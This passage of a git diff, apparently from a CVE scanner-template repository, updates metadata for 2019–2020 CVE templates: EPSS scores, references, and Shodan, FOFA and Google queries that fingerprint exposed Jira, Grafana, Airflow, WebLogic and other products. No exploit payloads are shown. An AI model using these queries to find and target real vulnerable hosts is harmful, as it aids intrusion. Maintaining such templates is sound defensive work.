b/http/cves/2019/CVE-2019-7139.yaml @@ -26,7 +26,10 @@ info: vendor: magento product: magento framework: magento - shodan-query: http.component:"Magento" + shodan-query: + - http.component:"Magento" + - cpe:"cpe:2.3:a:magento:magento" + - http.component:"magento" tags: cve,cve2019,sqli,magento http: diff --git a/http/cves/2019/CVE-2019-7192.yaml b/http/cves/2019/CVE-2019-7192.yaml index 2902504a75..7e0f7fd2c7 100644 --- a/http/cves/2019/CVE-2019-7192.yaml +++ b/http/cves/2019/CVE-2019-7192.yaml @@ -22,16 +22,24 @@ info: cve-id: CVE-2019-7192 cwe-id: CWE-863 epss-score: 0.96341 - epss-percentile: 0.99518 + epss-percentile: 0.99549 cpe: cpe:2.3:a:qnap:photo_station:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: qnap product: photo_station - shodan-query: 'Content-Length: 580 "http server 1.0"' - fofa-query: title="photo station" - google-query: intitle:"qnap" + shodan-query: + - 'Content-Length: 580 "http server 1.0"' + - http.title:"photo station" + - http.title:"qnap" + - 'content-length: 580 "http server 1.0"' + fofa-query: + - title="photo station" + - title="qnap" + google-query: + - intitle:"qnap" + - intitle:"photo station" tags: cve,cve2019,packetstorm,lfi,rce,kev,qnap,qts,xss http: diff --git a/http/cves/2019/CVE-2019-7254.yaml b/http/cves/2019/CVE-2019-7254.yaml index 3d394e5c25..c6b2718dd7 100644 --- a/http/cves/2019/CVE-2019-7254.yaml +++ b/http/cves/2019/CVE-2019-7254.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2019-7254 cwe-id: CWE-22 - epss-score: 0.85367 - epss-percentile: 0.98459 + epss-score: 0.85153 + epss-percentile: 0.9853 cpe: cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-7255.yaml b/http/cves/2019/CVE-2019-7255.yaml index 0acc08a350..788905205a 100644 --- a/http/cves/2019/CVE-2019-7255.yaml +++ b/http/cves/2019/CVE-2019-7255.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: nortekcontrol product: linear_emerge_essential_firmware - shodan-query: http.title:"eMerge" + shodan-query: + - http.title:"eMerge" + - http.title:"emerge" fofa-query: title="emerge" google-query: intitle:"emerge" tags: cve,cve2019,emerge,xss,packetstorm,nortek,nortekcontrol diff --git a/http/cves/2019/CVE-2019-7256.yaml b/http/cves/2019/CVE-2019-7256.yaml index 209a9925ea..2ea022182b 100644 --- a/http/cves/2019/CVE-2019-7256.yaml +++ b/http/cves/2019/CVE-2019-7256.yaml @@ -29,7 +29,9 @@ info: max-request: 2 vendor: nortekcontrol product: linear_emerge_essential_firmware - shodan-query: title:"eMerge" + shodan-query: + - title:"eMerge" + - http.title:"emerge" fofa-query: title="emerge" google-query: intitle:"emerge" tags: cve,cve2019,emerge,rce,edb,nortekcontrol,kev diff --git a/http/cves/2019/CVE-2019-7481.yaml b/http/cves/2019/CVE-2019-7481.yaml index 2a7931a208..77d1fcb755 100644 --- a/http/cves/2019/CVE-2019-7481.yaml +++ b/http/cves/2019/CVE-2019-7481.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2019-7481 cwe-id: CWE-89 - epss-score: 0.91724 - epss-percentile: 0.98849 + epss-score: 0.93107 + epss-percentile: 0.99046 cpe: cpe:2.3:o:sonicwall:sma_100_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-8086.yaml b/http/cves/2019/CVE-2019-8086.yaml index 0b06e29b23..7e3a8e2670 100644 --- a/http/cves/2019/CVE-2019-8086.yaml +++ b/http/cves/2019/CVE-2019-8086.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-8086 cwe-id: CWE-611 epss-score: 0.13896 - epss-percentile: 0.95514 + epss-percentile: 0.95652 cpe: cpe:2.3:a:adobe:experience_manager:6.2:*:*:*:*:*:*:* metadata: max-request: 2 @@ -30,6 +30,9 @@ info: shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" + - http.component:"adobe experience manager" + - http.title:"aem sign in" + - cpe:"cpe:2.3:a:adobe:experience_manager" fofa-query: title="aem sign in" google-query: intitle:"aem sign in" tags: cve,cve2019,aem,adobe diff --git a/http/cves/2019/CVE-2019-8442.yaml b/http/cves/2019/CVE-2019-8442.yaml index 9bcc15b9df..d86d89e9ef 100644 --- a/http/cves/2019/CVE-2019-8442.yaml +++ b/http/cves/2019/CVE-2019-8442.yaml @@ -26,7 +26,11 @@ info: max-request: 2 vendor: atlassian product: jira - shodan-query: http.component:"Atlassian Jira" + shodan-query: + - http.component:"Atlassian Jira" + - http.component:"atlassian jira" + - http.component:"atlassian confluence" + - cpe:"cpe:2.3:a:atlassian:jira" tags: cve,cve2019,atlassian,jira,lfi,intrusive http: diff --git a/http/cves/2019/CVE-2019-8446.yaml b/http/cves/2019/CVE-2019-8446.yaml index 1d800d541b..65aa34c64b 100644 --- a/http/cves/2019/CVE-2019-8446.yaml +++ b/http/cves/2019/CVE-2019-8446.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: atlassian product: jira_server - shodan-query: http.component:"Atlassian Jira" + shodan-query: + - http.component:"Atlassian Jira" + - http.component:"atlassian jira" tags: cve,cve2019,jira,atlassian http: diff --git a/http/cves/2019/CVE-2019-8449.yaml b/http/cves/2019/CVE-2019-8449.yaml index 29957e0fce..9e3dd4def2 100644 --- a/http/cves/2019/CVE-2019-8449.yaml +++ b/http/cves/2019/CVE-2019-8449.yaml @@ -27,7 +27,11 @@ info: max-request: 1 vendor: atlassian product: jira - shodan-query: http.component:"Atlassian Jira" + shodan-query: + - http.component:"Atlassian Jira" + - http.component:"atlassian jira" + - http.component:"atlassian confluence" + - cpe:"cpe:2.3:a:atlassian:jira" tags: cve,cve2019,atlassian,jira,disclosure,packetstorm http: diff --git a/http/cves/2019/CVE-2019-8451.yaml b/http/cves/2019/CVE-2019-8451.yaml index 2536b4407f..295bef09db 100644 --- a/http/cves/2019/CVE-2019-8451.yaml +++ b/http/cves/2019/CVE-2019-8451.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: atlassian product: jira_server - shodan-query: http.component:"Atlassian Jira" + shodan-query: + - http.component:"Atlassian Jira" + - http.component:"atlassian jira" tags: cve,cve2019,atlassian,jira,ssrf,oast,tenable,hackerone http: diff --git a/http/cves/2019/CVE-2019-8903.yaml b/http/cves/2019/CVE-2019-8903.yaml index 9428da6afa..d0cf1febb9 100644 --- a/http/cves/2019/CVE-2019-8903.yaml +++ b/http/cves/2019/CVE-2019-8903.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2019-8903 cwe-id: CWE-22 - epss-score: 0.01071 - epss-percentile: 0.82663 + epss-score: 0.01284 + epss-percentile: 0.85758 cpe: cpe:2.3:a:totaljs:total.js:*:*:*:*:*:node.js:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-8937.yaml b/http/cves/2019/CVE-2019-8937.yaml index 3318dce24d..a54bbaeff7 100644 --- a/http/cves/2019/CVE-2019-8937.yaml +++ b/http/cves/2019/CVE-2019-8937.yaml @@ -20,16 +20,20 @@ info: cvss-score: 6.1 cve-id: CVE-2019-8937 cwe-id: CWE-79 - epss-score: 0.00921 - epss-percentile: 0.81203 + epss-score: 0.00477 + epss-percentile: 0.75729 cpe: cpe:2.3:a:digitaldruid:hoteldruid:2.3.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: digitaldruid product: hoteldruid - shodan-query: http.title:"hoteldruid" - fofa-query: title="hoteldruid" + shodan-query: + - http.title:"hoteldruid" + - http.favicon.hash:-1521640213 + fofa-query: + - title="hoteldruid" + - icon_hash=-1521640213 google-query: intitle:"hoteldruid" tags: cve2019,cve,packetstorm,xss,hoteldruid,edb,digitaldruid diff --git a/http/cves/2019/CVE-2019-9632.yaml b/http/cves/2019/CVE-2019-9632.yaml index 5414d13aff..34bce5c76a 100644 --- a/http/cves/2019/CVE-2019-9632.yaml +++ b/http/cves/2019/CVE-2019-9632.yaml @@ -13,13 +13,14 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2019-9632 - epss-score: 0.00183 - epss-percentile: 0.54622 + epss-score: 0.05368 + epss-percentile: 0.93097 cpe: cpe:2.3:a:esafenet:electronic_document_security_management_system:v3:*:*:*:*:*:*:* metadata: + max-request: 1 vendor: esafenet - product: electronic_document_security_management_system - fofa-query: title="电子文档安全管理系统" + product: "electronic_document_security_management_system" + fofa-query: "title=\"电子文档安全管理系统\"" tags: cve,cve2019,esafenet,lfi http: diff --git a/http/cves/2019/CVE-2019-9670.yaml b/http/cves/2019/CVE-2019-9670.yaml index fe0cd4bef2..88368f5241 100644 --- a/http/cves/2019/CVE-2019-9670.yaml +++ b/http/cves/2019/CVE-2019-9670.yaml @@ -29,9 +29,15 @@ info: max-request: 1 vendor: synacor product: zimbra_collaboration_suite - shodan-query: http.title:"zimbra collaboration suite" - fofa-query: title="zimbra web client sign in" - google-query: intitle:"zimbra collaboration suite" + shodan-query: + - http.title:"zimbra collaboration suite" + - http.title:"zimbra web client sign in" + fofa-query: + - title="zimbra web client sign in" + - title="zimbra collaboration suite" + google-query: + - intitle:"zimbra collaboration suite" + - intitle:"zimbra web client sign in" tags: cve,cve2019,zimbra,xxe,kev,edb,packetstorm,synacor http: diff --git a/http/cves/2019/CVE-2019-9978.yaml b/http/cves/2019/CVE-2019-9978.yaml index c96d8eae2f..b7a2539eb5 100644 --- a/http/cves/2019/CVE-2019-9978.yaml +++ b/http/cves/2019/CVE-2019-9978.yaml @@ -27,7 +27,7 @@ info: product: social_warfare framework: wordpress fofa-query: body="social-warfare" && body="wp-" - tags: cve,cve2019,wordpress,wp-plugin,ssrf,kev,warfareplugins + tags: cve,cve2019,wordpress,wp-plugin,ssrf,kev,warfareplugins,xss flow: http(1) && http(2) http: diff --git a/http/cves/2020/CVE-2020-10148.yaml b/http/cves/2020/CVE-2020-10148.yaml index 22e9f0934e..953fcd0241 100644 --- a/http/cves/2020/CVE-2020-10148.yaml +++ b/http/cves/2020/CVE-2020-10148.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-10148 cwe-id: CWE-287,CWE-288 - epss-score: 0.97273 - epss-percentile: 0.99841 + epss-score: 0.97265 + epss-percentile: 0.99853 cpe: cpe:2.3:a:solarwinds:orion_platform:2019.4:hotfix5:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-10220.yaml b/http/cves/2020/CVE-2020-10220.yaml index 25e0f04b91..ef7f3d4c88 100644 --- a/http/cves/2020/CVE-2020-10220.yaml +++ b/http/cves/2020/CVE-2020-10220.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: rconfig product: rconfig - shodan-query: title:"rConfig" + shodan-query: + - title:"rConfig" + - http.title:"rconfig" fofa-query: title="rconfig" google-query: intitle:"rconfig" tags: cve,cve2020,packetstorm,rconfig,sqli diff --git a/http/cves/2020/CVE-2020-10548.yaml b/http/cves/2020/CVE-2020-10548.yaml index f3bf88843c..c097bcee0e 100644 --- a/http/cves/2020/CVE-2020-10548.yaml +++ b/http/cves/2020/CVE-2020-10548.yaml @@ -13,13 +13,15 @@ info: - https://github.com/theguly/exploits/blob/master/CVE-2020-10548.py - https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2020-10548 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/Elsfa7-110/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-10548 cwe-id: CWE-89 - epss-score: 0.45422 - epss-percentile: 0.97076 + epss-score: 0.38355 + epss-percentile: 0.97221 cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-10770.yaml b/http/cves/2020/CVE-2020-10770.yaml index 5546917b8a..e362702a83 100644 --- a/http/cves/2020/CVE-2020-10770.yaml +++ b/http/cves/2020/CVE-2020-10770.yaml @@ -27,8 +27,14 @@ info: max-request: 1 vendor: redhat product: keycloak - shodan-query: http.html:"keycloak" - fofa-query: title="keycloak" + shodan-query: + - http.html:"keycloak" + - http.title:"keycloak" + - http.favicon.hash:-1105083093 + fofa-query: + - title="keycloak" + - icon_hash=-1105083093 + - body="keycloak" google-query: intitle:"keycloak" tags: cve,cve2020,keycloak,ssrf,oast,blind,packetstorm,edb,redhat diff --git a/http/cves/2020/CVE-2020-10973.yaml b/http/cves/2020/CVE-2020-10973.yaml index 848778bd28..1a06464e1a 100644 --- a/http/cves/2020/CVE-2020-10973.yaml +++ b/http/cves/2020/CVE-2020-10973.yaml @@ -22,14 +22,16 @@ info: cve-id: CVE-2020-10973 cwe-id: CWE-306 epss-score: 0.02524 - epss-percentile: 0.8991 + epss-percentile: 0.90149 cpe: cpe:2.3:o:wavlink:wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: wavlink product: wn530hg4_firmware - shodan-query: http.html:"Wavlink" + shodan-query: + - http.html:"Wavlink" + - http.html:"wavlink" fofa-query: body="wavlink" tags: cve,cve2020,exposure,wavlink diff --git a/http/cves/2020/CVE-2020-11034.yaml b/http/cves/2020/CVE-2020-11034.yaml index 0e6c8904c3..99dbd41fb3 100644 --- a/http/cves/2020/CVE-2020-11034.yaml +++ b/http/cves/2020/CVE-2020-11034.yaml @@ -26,8 +26,12 @@ info: max-request: 2 vendor: glpi-project product: glpi - shodan-query: http.title:"glpi" - fofa-query: icon_hash="-1474875778" + shodan-query: + - http.title:"glpi" + - http.favicon.hash:"-1474875778" + fofa-query: + - icon_hash="-1474875778" + - title="glpi" google-query: intitle:"glpi" tags: cve,cve2020,redirect,glpi,glpi-project diff --git a/http/cves/2020/CVE-2020-11110.yaml b/http/cves/2020/CVE-2020-11110.yaml index 57b6027709..1d3a1f9d19 100644 --- a/http/cves/2020/CVE-2020-11110.yaml +++ b/http/cves/2020/CVE-2020-11110.yaml @@ -20,14 +20,19 @@ info: cve-id: CVE-2020-11110 cwe-id: CWE-79 epss-score: 0.00512 - epss-percentile: 0.76153 + epss-percentile: 0.76553 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: grafana product: grafana - shodan-query: title:"Grafana" - fofa-query: title="grafana" + shodan-query: + - title:"Grafana" + - cpe:"cpe:2.3:a:grafana:grafana" + - http.title:"grafana" + fofa-query: + - title="grafana" + - app="grafana" google-query: intitle:"grafana" tags: cve2020,cve,xss,grafana,hackerone diff --git a/http/cves/2020/CVE-2020-11546.yaml b/http/cves/2020/CVE-2020-11546.yaml index 8e5b0394cc..963f73091a 100644 --- a/http/cves/2020/CVE-2020-11546.yaml +++ b/http/cves/2020/CVE-2020-11546.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: superwebmailer product: superwebmailer - shodan-query: title:"SuperWebMailer" + shodan-query: + - title:"SuperWebMailer" + - http.title:"superwebmailer" fofa-query: title="superwebmailer" google-query: intitle:"superwebmailer" tags: cve,cve2020,rce,superwebmailer diff --git a/http/cves/2020/CVE-2020-11547.yaml b/http/cves/2020/CVE-2020-11547.yaml index db184e8204..d183a3abe4 100644 --- a/http/cves/2020/CVE-2020-11547.yaml +++ b/http/cves/2020/CVE-2020-11547.yaml @@ -28,7 +28,9 @@ info: max-request: 3 vendor: paessler product: prtg_network_monitor - shodan-query: title:"prtg" + shodan-query: + - title:"prtg" + - http.title:"prtg" fofa-query: title="prtg" google-query: intitle:"prtg" tags: cve2020,cve,prtg,disclosure,paessler diff --git a/http/cves/2020/CVE-2020-11798.yaml b/http/cves/2020/CVE-2020-11798.yaml index ff6efdaa32..81af982824 100644 --- a/http/cves/2020/CVE-2020-11798.yaml +++ b/http/cves/2020/CVE-2020-11798.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: mitel product: micollab_audio\,_web_\&_video_conferencing - shodan-query: html:"Mitel" html:"MiCollab" + shodan-query: + - html:"Mitel" html:"MiCollab" + - http.html:"mitel" html:"micollab" fofa-query: body="mitel" html:"micollab" tags: cve,cve2020,packetstorm,mitel,micollab,lfi diff --git a/http/cves/2020/CVE-2020-11930.yaml b/http/cves/2020/CVE-2020-11930.yaml index 786452b790..433afbeae1 100644 --- a/http/cves/2020/CVE-2020-11930.yaml +++ b/http/cves/2020/CVE-2020-11930.yaml @@ -27,9 +27,9 @@ info: vendor: gtranslate product: translate_wordpress_with_gtranslate framework: wordpress - publicwww-query: "/wp-content/plugins/gtranslate" shodan-query: http.html:/wp-content/plugins/gtranslate fofa-query: body=/wp-content/plugins/gtranslate + publicwww-query: "/wp-content/plugins/gtranslate" tags: cve2020,cve,wordpress,wp,xss,wp-plugin,wpscan,gtranslate http: diff --git a/http/cves/2020/CVE-2020-11978.yaml b/http/cves/2020/CVE-2020-11978.yaml index 0d9cd257c1..4b3f7c5341 100644 --- a/http/cves/2020/CVE-2020-11978.yaml +++ b/http/cves/2020/CVE-2020-11978.yaml @@ -27,9 +27,18 @@ info: max-request: 4 vendor: apache product: airflow - shodan-query: title:"Airflow - DAGs" || http.html:"Apache Airflow" - fofa-query: title="sign in - airflow" - google-query: intitle:"sign in - airflow" + shodan-query: + - title:"Airflow - DAGs" || http.html:"Apache Airflow" + - http.title:"airflow - dags" || http.html:"apache airflow" + - http.title:"sign in - airflow" + - product:"redis" + fofa-query: + - title="sign in - airflow" + - apache airflow + - title="airflow - dags" || http.html:"apache airflow" + google-query: + - intitle:"sign in - airflow" + - intitle:"airflow - dags" || http.html:"apache airflow" tags: cve2020,cve,packetstorm,apache,airflow,rce,kev http: diff --git a/http/cves/2020/CVE-2020-11991.yaml b/http/cves/2020/CVE-2020-11991.yaml index 791f1581fc..7ff44c742d 100644 --- a/http/cves/2020/CVE-2020-11991.yaml +++ b/http/cves/2020/CVE-2020-11991.yaml @@ -26,7 +26,9 @@ info: max-request: 1 vendor: apache product: cocoon - shodan-query: http.html:"Apache Cocoon" + shodan-query: + - http.html:"Apache Cocoon" + - http.html:"apache cocoon" fofa-query: body="apache cocoon" tags: cve,cve2020,apache,xml,cocoon,xxe diff --git a/http/cves/2020/CVE-2020-12127.yaml b/http/cves/2020/CVE-2020-12127.yaml index e675e097b6..ab04c893f2 100644 --- a/http/cves/2020/CVE-2020-12127.yaml +++ b/http/cves/2020/CVE-2020-12127.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: wavlink product: wn530h4_firmware - shodan-query: http.html:"Wavlink" + shodan-query: + - http.html:"Wavlink" + - http.html:"wavlink" fofa-query: body="wavlink" tags: cve,cve2020,wavlink,exposure diff --git a/http/cves/2020/CVE-2020-12256.yaml b/http/cves/2020/CVE-2020-12256.yaml index 2ef7a5398f..8865dab557 100644 --- a/http/cves/2020/CVE-2020-12256.yaml +++ b/http/cves/2020/CVE-2020-12256.yaml @@ -25,7 +25,9 @@ info: max-request: 3 vendor: rconfig product: rconfig - shodan-query: http.title:"rConfig" + shodan-query: + - http.title:"rConfig" + - http.title:"rconfig" fofa-query: title="rconfig" google-query: intitle:"rconfig" tags: cve,cve2020,rconfig,authenticated,xss diff --git a/http/cves/2020/CVE-2020-12259.yaml b/http/cves/2020/CVE-2020-12259.yaml index 3c8e1872fd..7ccf44fab0 100644 --- a/http/cves/2020/CVE-2020-12259.yaml +++ b/http/cves/2020/CVE-2020-12259.yaml @@ -25,7 +25,9 @@ info: max-request: 3 vendor: rconfig product: rconfig - shodan-query: http.title:"rConfig" + shodan-query: + - http.title:"rConfig" + - http.title:"rconfig" fofa-query: title="rconfig" google-query: intitle:"rconfig" tags: cve2020,cve,rconfig,authenticated,xss diff --git a/http/cves/2020/CVE-2020-12720.yaml b/http/cves/2020/CVE-2020-12720.yaml index b15acb6d9e..daeafc8fac 100644 --- a/http/cves/2020/CVE-2020-12720.yaml +++ b/http/cves/2020/CVE-2020-12720.yaml @@ -27,9 +27,17 @@ info: max-request: 1 vendor: vbulletin product: vbulletin - google-query: intext:"powered by vbulletin" - shodan-query: http.title:"powered by vbulletin" - fofa-query: body="powered by vbulletin" + shodan-query: + - http.title:"powered by vbulletin" + - http.html:"powered by vbulletin" + - http.component:"vbulletin" + - cpe:"cpe:2.3:a:vbulletin:vbulletin" + fofa-query: + - body="powered by vbulletin" + - title="powered by vbulletin" + google-query: + - intext:"powered by vbulletin" + - intitle:"powered by vbulletin" tags: cve2020,cve,vbulletin,sqli,packetstorm http: diff --git a/http/cves/2020/CVE-2020-13379.yaml b/http/cves/2020/CVE-2020-13379.yaml index 030220caea..cf439bfa51 100644 --- a/http/cves/2020/CVE-2020-13379.yaml +++ b/http/cves/2020/CVE-2020-13379.yaml @@ -28,8 +28,13 @@ info: max-request: 2 vendor: grafana product: grafana - shodan-query: title:"Grafana" - fofa-query: title="grafana" + shodan-query: + - title:"Grafana" + - cpe:"cpe:2.3:a:grafana:grafana" + - http.title:"grafana" + fofa-query: + - title="grafana" + - app="grafana" google-query: intitle:"grafana" tags: cve2020,cve,grafana,ssrf diff --git a/http/cves/2020/CVE-2020-13405.yaml b/http/cves/2020/CVE-2020-13405.yaml index 99a739faf3..df7142e1a8 100644 --- a/http/cves/2020/CVE-2020-13405.yaml +++ b/http/cves/2020/CVE-2020-13405.yaml @@ -29,8 +29,12 @@ info: max-request: 3 vendor: microweber product: microweber - shodan-query: http.html:"microweber" - fofa-query: body="microweber" + shodan-query: + - http.html:"microweber" + - http.favicon.hash:780351152 + fofa-query: + - body="microweber" + - icon_hash=780351152 tags: cve,cve2020,microweber,unauth,disclosure http: diff --git a/http/cves/2020/CVE-2020-13638.yaml b/http/cves/2020/CVE-2020-13638.yaml index 92ca22db2a..63019efb04 100644 --- a/http/cves/2020/CVE-2020-13638.yaml +++ b/http/cves/2020/CVE-2020-13638.yaml @@ -23,7 +23,9 @@ info: max-request: 3 vendor: rconfig product: rconfig - shodan-query: http.title:"rConfig" + shodan-query: + - http.title:"rConfig" + - http.title:"rconfig" fofa-query: title="rconfig" google-query: intitle:"rconfig" tags: cve,cve2020,rconfig,auth-bypass,intrusive diff --git a/http/cves/2020/CVE-2020-13700.yaml b/http/cves/2020/CVE-2020-13700.yaml index 1ac48b20e1..0e01c50f26 100644 --- a/http/cves/2020/CVE-2020-13700.yaml +++ b/http/cves/2020/CVE-2020-13700.yaml @@ -15,13 +15,14 @@ info: - https://wordpress.org/plugins/acf-to-rest-api/#developers - https://github.com/airesvsg/acf-to-rest-api - https://nvd.nist.gov/vuln/detail/CVE-2020-13700 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-13700 cwe-id: CWE-639 epss-score: 0.01831 - epss-percentile: 0.86908 + epss-percentile: 0.88233 cpe: cpe:2.3:a:acf_to_rest_api_project:acf_to_rest_api:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-13820.yaml b/http/cves/2020/CVE-2020-13820.yaml index bedcfa1f6d..38d3f8f5cf 100644 --- a/http/cves/2020/CVE-2020-13820.yaml +++ b/http/cves/2020/CVE-2020-13820.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: extremenetworks product: extreme_management_center - shodan-query: title:"Extreme Management Center" + shodan-query: + - title:"Extreme Management Center" + - http.title:"extreme management center" fofa-query: title="extreme management center" google-query: intitle:"extreme management center" tags: cve2020,cve,xss,extremenetworks diff --git a/http/cves/2020/CVE-2020-13851.yaml b/http/cves/2020/CVE-2020-13851.yaml index f193789ad1..8e6a4af6a1 100644 --- a/http/cves/2020/CVE-2020-13851.yaml +++ b/http/cves/2020/CVE-2020-13851.yaml @@ -16,15 +16,17 @@ info: cvss-score: 8.8 cve-id: CVE-2020-13851 cwe-id: CWE-78 - epss-score: 0.96952 - epss-percentile: 0.99674 + epss-score: 0.96994 + epss-percentile: 0.99737 cpe: cpe:2.3:a:pandorafms:pandora_fms:7.44:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: pandorafms product: pandora_fms - shodan-query: title:"Pandora FMS" + shodan-query: + - title:"Pandora FMS" + - http.title:"pandora fms" fofa-query: title="pandora fms" google-query: intitle:"pandora fms" tags: cve2020,cve,packetstorm,rce,pandora,unauth,artica,pandorafms diff --git a/http/cves/2020/CVE-2020-13927.yaml b/http/cves/2020/CVE-2020-13927.yaml index 45a1234b6f..281b489fdf 100644 --- a/http/cves/2020/CVE-2020-13927.yaml +++ b/http/cves/2020/CVE-2020-13927.yaml @@ -29,9 +29,18 @@ info: max-request: 1 vendor: apache product: airflow - shodan-query: title:"Airflow - DAGs" || http.html:"Apache Airflow" - fofa-query: title="sign in - airflow" - google-query: intitle:"sign in - airflow" + shodan-query: + - title:"Airflow - DAGs" || http.html:"Apache Airflow" + - http.title:"airflow - dags" || http.html:"apache airflow" + - http.title:"sign in - airflow" + - product:"redis" + fofa-query: + - title="sign in - airflow" + - apache airflow + - title="airflow - dags" || http.html:"apache airflow" + google-query: + - intitle:"sign in - airflow" + - intitle:"airflow - dags" || http.html:"apache airflow" tags: cve2020,cve,packetstorm,apache,airflow,unauth,auth-bypass,kev http: diff --git a/http/cves/2020/CVE-2020-13945.yaml b/http/cves/2020/CVE-2020-13945.yaml index 6d90732cdd..381ece6a6c 100644 --- a/http/cves/2020/CVE-2020-13945.yaml +++ b/http/cves/2020/CVE-2020-13945.yaml @@ -27,8 +27,8 @@ info: max-request: 2 vendor: apache product: apisix - fofa-query: title="apache apisix dashboard" shodan-query: http.title:"apache apisix dashboard" + fofa-query: title="apache apisix dashboard" google-query: intitle:"apache apisix dashboard" tags: cve2020,cve,intrusive,vulhub,packetstorm,apache,apisix diff --git a/http/cves/2020/CVE-2020-14144.yaml b/http/cves/2020/CVE-2020-14144.yaml index 5e498b43ba..bf6c389ceb 100644 --- a/http/cves/2020/CVE-2020-14144.yaml +++ b/http/cves/2020/CVE-2020-14144.yaml @@ -28,8 +28,14 @@ info: max-request: 7 vendor: gitea product: gitea - shodan-query: html:"Powered by Gitea Version" - fofa-query: body="powered by gitea version" + shodan-query: + - html:"Powered by Gitea Version" + - http.html:"powered by gitea version" + - http.title:"gitea" + - cpe:"cpe:2.3:a:gitea:gitea" + fofa-query: + - body="powered by gitea version" + - title="gitea" google-query: intitle:"gitea" tags: cve2020,cve,rce,gitea,authenticated,git,intrusive diff --git a/http/cves/2020/CVE-2020-14179.yaml b/http/cves/2020/CVE-2020-14179.yaml index 562498ec4e..1f8af06135 100644 --- a/http/cves/2020/CVE-2020-14179.yaml +++ b/http/cves/2020/CVE-2020-14179.yaml @@ -26,7 +26,9 @@ info: max-request: 1 vendor: atlassian product: jira_data_center - shodan-query: http.component:"Atlassian Jira" + shodan-query: + - http.component:"Atlassian Jira" + - http.component:"atlassian jira" tags: cve,cve2020,atlassian,jira,exposure,disclosure http: diff --git a/http/cves/2020/CVE-2020-14181.yaml b/http/cves/2020/CVE-2020-14181.yaml index bd7e1f4460..2c721a7b20 100644 --- a/http/cves/2020/CVE-2020-14181.yaml +++ b/http/cves/2020/CVE-2020-14181.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: atlassian product: data_center - shodan-query: http.component:"Atlassian Jira" + shodan-query: + - http.component:"Atlassian Jira" + - http.component:"atlassian jira" tags: cve,cve2020,atlassian,jira,packetstorm http: diff --git a/http/cves/2020/CVE-2020-14408.yaml b/http/cves/2020/CVE-2020-14408.yaml index 8311477ae9..e2badfa1ba 100644 --- a/http/cves/2020/CVE-2020-14408.yaml +++ b/http/cves/2020/CVE-2020-14408.yaml @@ -28,8 +28,12 @@ info: max-request: 1 vendor: agentejo product: cockpit - shodan-query: http.favicon.hash:688609340 - fofa-query: icon_hash=688609340 + shodan-query: + - http.favicon.hash:688609340 + - http.html:"cockpit" + fofa-query: + - icon_hash=688609340 + - body="cockpit" tags: cve2020,cve,cockpit,agentejo,xss,oss http: diff --git a/http/cves/2020/CVE-2020-14750.yaml b/http/cves/2020/CVE-2020-14750.yaml index 41b8fdbff3..559b32d018 100644 --- a/http/cves/2020/CVE-2020-14750.yaml +++ b/http/cves/2020/CVE-2020-14750.yaml @@ -28,8 +28,13 @@ info: max-request: 1 vendor: oracle product: fusion_middleware - shodan-query: http.html:"Weblogic Application Server" - fofa-query: title="weblogic" + shodan-query: + - http.html:"Weblogic Application Server" + - http.title:"weblogic" + - http.html:"weblogic application server" + fofa-query: + - title="weblogic" + - body="weblogic application server" google-query: intitle:"weblogic" tags: cve2020,cve,rce,oracle,weblogic,unauth,kev,packetstorm diff --git a/http/cves/2020/CVE-2020-14882.yaml b/http/cves/2020/CVE-2020-14882.yaml index 1d64c775ac..a7aaf3bace 100644 --- a/http/cves/2020/CVE-2020-14882.yaml +++ b/http/cves/2020/CVE-2020-14882.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: oracle product: weblogic_server - shodan-query: http.title:"oracle peoplesoft sign-in" + shodan-query: + - http.title:"oracle peoplesoft sign-in" + - product:"oracle weblogic" fofa-query: title="oracle peoplesoft sign-in" google-query: intitle:"oracle peoplesoft sign-in" tags: cve2020,cve,oracle,rce,weblogic,oast,kev diff --git a/http/cves/2020/CVE-2020-14883.yaml b/http/cves/2020/CVE-2020-14883.yaml index 543fa4712c..420a8e3da1 100644 --- 